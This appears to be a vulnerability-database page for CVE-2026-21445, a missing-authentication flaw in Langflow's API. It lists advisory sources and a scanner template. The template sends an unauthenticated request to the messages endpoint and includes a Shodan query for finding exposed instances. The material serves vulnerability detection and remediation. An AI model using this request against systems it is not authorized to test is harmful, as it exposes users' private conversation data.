| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| The vulnerability of the software interface of the tool for creating and deploying agents and working processes in Langflow allows a perpetrator to execute arbitrary code. | 13 Apr 202600:00 | – | bdu_fstec | |
| CVE-2026-21445 | 2 Jan 202616:18 | – | circl | |
| Langflow 访问控制错误漏洞 | 2 Jan 202600:00 | – | cnnvd | |
| CVE-2026-21445 | 2 Jan 202619:11 | – | cve | |
| CVE-2026-21445 Langflow Missing Authentication on Critical API Endpoints | 2 Jan 202619:11 | – | cvelist | |
| EUVD-2026-0034 | 2 Jan 202619:11 | – | euvd | |
| Langflow Missing Authentication on Critical API Endpoints | 2 Jan 202621:11 | – | github | |
| CVE-2026-21445 | 2 Jan 202620:16 | – | nvd | |
| CVE-2026-21445 Langflow Missing Authentication on Critical API Endpoints | 2 Jan 202619:11 | – | osv | |
| GHSA-C5CP-VX83-JHQX Langflow Missing Authentication on Critical API Endpoints | 2 Jan 202621:11 | – | osv |
id: CVE-2026-21445
info:
name: Langflow - Broken Access Control
author: DhiyaneshDk
severity: critical
description: |
Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.
remediation: Update to version 1.7.0.dev45 or later.
impact: |
Unauthenticated attackers can access sensitive user data and perform destructive actions, risking data loss and privacy breaches.
reference:
- https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx
- https://nvd.nist.gov/vuln/detail/CVE-2026-21445
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2026-21445
cwe-id: CWE-306
epss-score: 0.20655
epss-percentile: 0.97221
metadata:
verified: true
max-request: 1
vendor: langflow-ai
product: langflow
shodan-query: html:"Langflow"
tags: cve,cve2026,langflow,auth-bypass,unauth,vkev
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/monitor/messages"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"text":'
- '"timestamp":'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a004630440220115f2bf7a894f21a3cfbc82b34fa25a990ef484b30a29589cf4eb0e70301b0820220661dc2c86e91233d1fa19f742e907b8172e0527d41f50f2a15f5dc87f72b6e67:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation